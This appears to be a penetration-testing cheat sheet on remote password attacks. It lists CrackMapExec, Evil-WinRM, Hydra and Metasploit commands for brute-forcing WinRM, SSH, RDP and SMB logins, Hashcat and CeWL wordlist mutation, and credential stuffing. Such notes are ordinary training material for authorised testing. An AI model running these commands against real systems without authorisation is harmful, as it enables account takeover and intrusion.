Remote Password Attacks

Network Services

WinRM - 5985(HTTP), 5986(HTTPS)

CrackMapExec

# Installation
sudo apt-get -y install crackmapexec

# Usage
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm ip -u user.list -p password.list

Evil-WinRM

# Installation
sudo gem install evil-winrm

# Usage
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i ip -u user -p password

SSH

Hydra

# Brute Forcing 
hydra -L user.list -P password.list ssh://ip

Remote Desktop Protocol (RDP)

Hydra

# Brute Forcing
hydra -L user.list -P password.list rdp://ip

SMB

Hydra

# Burte Force
hydra -L user.list -P password.list smb://ip

Metasploit Framework

# Brute Forcing Module
use auxiliary/scanner/smb/smb_login

Password Mutuations

Creating Wordlists

Hashcat

Function
Description

:

Do nothing.

l

Lowercase all letters.

u

Uppercase all letters.

c

Capitalize the first letter and lowercase others.

sXY

Replace all instances of X with Y.

$!

Add the exclamation character at the end.

# Generating Rule-based Wordlist
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

# Hashcat Existing Rules
ls /usr/share/hashcat/rules/

CeWL

# Creating Wordlist
cewl <https://Site.com> -d 4 -m 6 --lowercase -w created.wordlist

Password Reuse / Default Passwords

Credential Stuffing

# Hydra
# create a new list that separates credentials with a colon (username:password)
hydra -C <user_pass.list> <protocol>://<IP>
PreviousCracking FilesNextPivoting, Tunneling, and Port Forwarding

Last updated